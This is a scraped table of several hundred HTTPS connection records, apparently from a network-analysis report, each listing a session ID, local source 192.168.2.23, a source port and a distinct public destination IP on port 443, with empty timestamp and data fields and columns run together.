                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21498192.168.2.234287691.24.180.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21499192.168.2.2348186139.181.98.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21500192.168.2.234854287.229.164.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21501192.168.2.235048499.51.143.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21502192.168.2.2333732145.179.137.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21503192.168.2.2341212105.79.49.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21504192.168.2.235826484.77.53.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21505192.168.2.2336312144.222.120.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21506192.168.2.233888817.113.249.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21507192.168.2.235423223.237.40.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21508192.168.2.2336622171.41.124.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21509192.168.2.2354178203.100.247.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21510192.168.2.2353326151.76.23.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21511192.168.2.235797641.54.230.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21512192.168.2.2350626176.137.50.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21513192.168.2.2342484177.38.102.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21514192.168.2.234551287.240.2.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21515192.168.2.2357816114.52.236.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21516192.168.2.2338344112.221.225.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21517192.168.2.235867646.197.234.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21518192.168.2.2355884198.175.46.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21519192.168.2.2343726161.170.45.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21520192.168.2.2352970160.39.156.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21521192.168.2.2357214123.172.85.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21522192.168.2.2343092185.15.0.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21523192.168.2.234101036.29.178.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21524192.168.2.2340676110.244.248.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21525192.168.2.2357524189.206.65.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21526192.168.2.2338034188.222.58.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21527192.168.2.235847814.245.8.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21528192.168.2.2339008163.41.159.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21529192.168.2.234892423.132.58.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21530192.168.2.2337270178.12.126.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21531192.168.2.233768480.146.123.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21532192.168.2.235769238.142.239.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21533192.168.2.233632058.81.143.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21534192.168.2.234086472.40.114.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21535192.168.2.2355770203.86.221.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21536192.168.2.2342612173.234.107.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21537192.168.2.233954886.142.5.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21538192.168.2.235461876.66.7.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21539192.168.2.2349940106.215.210.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21540192.168.2.234814273.219.243.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21541192.168.2.2339724153.111.252.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21542192.168.2.2335906106.142.162.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21543192.168.2.233804888.193.219.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21544192.168.2.2356874114.175.12.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21545192.168.2.2346772111.170.12.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21546192.168.2.2336756212.253.24.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21547192.168.2.2346660223.233.57.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21548192.168.2.2341916223.177.251.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21549192.168.2.234607632.177.143.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21550192.168.2.235700862.114.148.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21551192.168.2.234692035.172.123.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21552192.168.2.2345036164.208.105.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21553192.168.2.2333102175.43.192.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21554192.168.2.233323676.25.141.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21555192.168.2.23400101.50.135.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21556192.168.2.233672063.204.64.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21557192.168.2.233743291.53.230.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21558192.168.2.2339814177.216.225.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21559192.168.2.233406260.25.32.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21560192.168.2.234113061.78.208.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21561192.168.2.2340104196.161.134.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21562192.168.2.2353636220.193.195.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21563192.168.2.235461466.145.144.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21564192.168.2.234302892.217.100.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21565192.168.2.2333072201.169.131.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21566192.168.2.234757289.43.224.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21567192.168.2.235438217.222.227.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21568192.168.2.2349212146.172.198.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21569192.168.2.2340794108.61.48.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21570192.168.2.234748285.212.252.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21571192.168.2.2349244184.175.230.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21572192.168.2.2343906130.97.64.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21573192.168.2.2343396157.221.252.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21574192.168.2.2342920108.116.192.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21575192.168.2.2352702164.73.19.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21576192.168.2.2342462223.210.251.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21577192.168.2.234555217.207.49.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21578192.168.2.2350260190.207.223.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21579192.168.2.2341952196.214.199.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21580192.168.2.234392088.159.170.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21581192.168.2.23336444.187.43.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21582192.168.2.2338634222.209.27.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21583192.168.2.233621474.175.212.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21584192.168.2.233914493.184.227.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21585192.168.2.2348526188.251.79.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21586192.168.2.234986413.156.158.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21587192.168.2.234831860.190.153.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21588192.168.2.2357560137.230.125.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21589192.168.2.2354798143.175.119.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21590192.168.2.2349850105.118.26.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21591192.168.2.2351212207.238.187.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21592192.168.2.233900495.135.45.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21593192.168.2.2347808211.81.111.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21594192.168.2.23481942.200.46.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21595192.168.2.235546667.117.200.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21596192.168.2.2349632103.142.152.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21597192.168.2.234799443.21.142.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21598192.168.2.2338952181.159.121.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21599192.168.2.2339928167.36.57.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21600192.168.2.2347854195.183.185.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21601192.168.2.233567231.40.218.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21602192.168.2.2360476194.114.184.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21603192.168.2.2353182149.108.140.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21604192.168.2.2352444119.179.178.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21605192.168.2.2345854146.119.133.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21606192.168.2.2335022156.47.22.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21607192.168.2.233828246.208.236.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21608192.168.2.235079090.166.60.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21609192.168.2.2358334184.70.126.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21610192.168.2.2334866113.78.182.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21611192.168.2.2340520159.12.62.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21612192.168.2.2340386103.127.147.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21613192.168.2.2346930123.150.238.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21614192.168.2.235590283.254.72.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21615192.168.2.2357736158.114.199.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21616192.168.2.2353558156.3.149.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21617192.168.2.234544465.113.230.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21618192.168.2.233740840.46.119.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21619192.168.2.234449638.73.235.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21620192.168.2.2335622125.41.36.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21621192.168.2.2360246203.189.84.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21622192.168.2.2336124129.128.151.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21623192.168.2.2353432202.171.183.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21624192.168.2.2333694205.77.57.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21625192.168.2.2351296187.25.173.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21626192.168.2.2356118157.138.183.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21627192.168.2.2358622114.195.49.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21628192.168.2.235693417.147.127.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21629192.168.2.2339770182.6.23.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21630192.168.2.2354244179.155.30.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21631192.168.2.234677083.115.57.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21632192.168.2.23415185.25.168.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21633192.168.2.235536065.228.21.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21634192.168.2.2352004107.213.207.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21635192.168.2.2336050119.155.36.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21636192.168.2.2339254161.69.164.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21637192.168.2.234680295.175.161.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21638192.168.2.2344616152.199.195.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21639192.168.2.235866673.181.3.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21640192.168.2.235346273.91.188.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21641192.168.2.234904032.9.195.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21642192.168.2.2336754150.115.101.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21643192.168.2.235878424.133.78.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21644192.168.2.2336582129.56.126.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21645192.168.2.2340856154.82.184.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21646192.168.2.2354492110.18.118.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21647192.168.2.234643641.198.104.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21648192.168.2.2347344217.119.186.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21649192.168.2.23360204.233.177.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21650192.168.2.23351048.139.69.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21651192.168.2.234276867.49.71.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21652192.168.2.2350902203.130.4.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21653192.168.2.2356234106.27.24.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21654192.168.2.2360054164.133.247.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21655192.168.2.2353686123.177.250.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21656192.168.2.234749646.144.43.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21657192.168.2.2353110112.193.13.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21658192.168.2.235710059.144.135.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21659192.168.2.2333854160.217.90.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21660192.168.2.234883425.4.244.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21661192.168.2.2351800218.180.162.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21662192.168.2.235035245.106.211.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21663192.168.2.2353360129.2.109.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21664192.168.2.2358988102.59.150.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21665192.168.2.2340252200.211.220.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21666192.168.2.2335302191.116.24.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21667192.168.2.2339306125.194.202.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21668192.168.2.234480883.82.49.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21669192.168.2.2353078110.75.150.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21670192.168.2.234185219.87.164.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21671192.168.2.2360112173.86.123.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21672192.168.2.235695874.198.167.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21673192.168.2.2346796137.122.92.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21674192.168.2.2357342170.160.69.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21675192.168.2.2345046158.98.172.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21676192.168.2.2356070131.234.138.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21677192.168.2.2341166172.188.17.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21678192.168.2.2352344145.226.188.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21679192.168.2.2354162124.113.90.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21680192.168.2.234271486.17.127.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21681192.168.2.2354184154.65.54.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21682192.168.2.234656839.120.14.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21683192.168.2.233623070.147.153.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21684192.168.2.234857223.171.243.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21685192.168.2.2338944207.115.244.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21686192.168.2.2356522111.231.178.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21687192.168.2.2338698141.187.163.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21688192.168.2.2352314153.253.31.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21689192.168.2.2343796103.50.96.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21690192.168.2.234192019.185.43.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21691192.168.2.2356170203.178.201.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21692192.168.2.2338954136.223.211.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21693192.168.2.235479639.102.8.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21694192.168.2.235706434.169.140.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21695192.168.2.233750018.84.29.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21696192.168.2.2351050146.172.148.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21697192.168.2.235590457.144.101.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21698192.168.2.234193034.216.46.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21699192.168.2.2338018148.55.68.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21700192.168.2.2337314100.165.78.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21701192.168.2.2342898160.235.224.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21702192.168.2.234272495.245.179.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21703192.168.2.235585061.216.188.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21704192.168.2.2344028139.142.86.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21705192.168.2.234146882.176.166.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21706192.168.2.2360454126.151.214.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21707192.168.2.2346358142.180.251.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21708192.168.2.2352338123.16.58.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21709192.168.2.234691427.167.227.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21710192.168.2.234040638.135.37.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21711192.168.2.234463014.153.79.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21712192.168.2.23397522.187.221.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21713192.168.2.23414285.219.233.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21714192.168.2.2344446205.97.91.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21715192.168.2.2355234136.191.155.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21716192.168.2.2333092108.227.192.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21717192.168.2.234220476.7.117.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21718192.168.2.2354778193.252.175.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21719192.168.2.234754448.156.162.117443
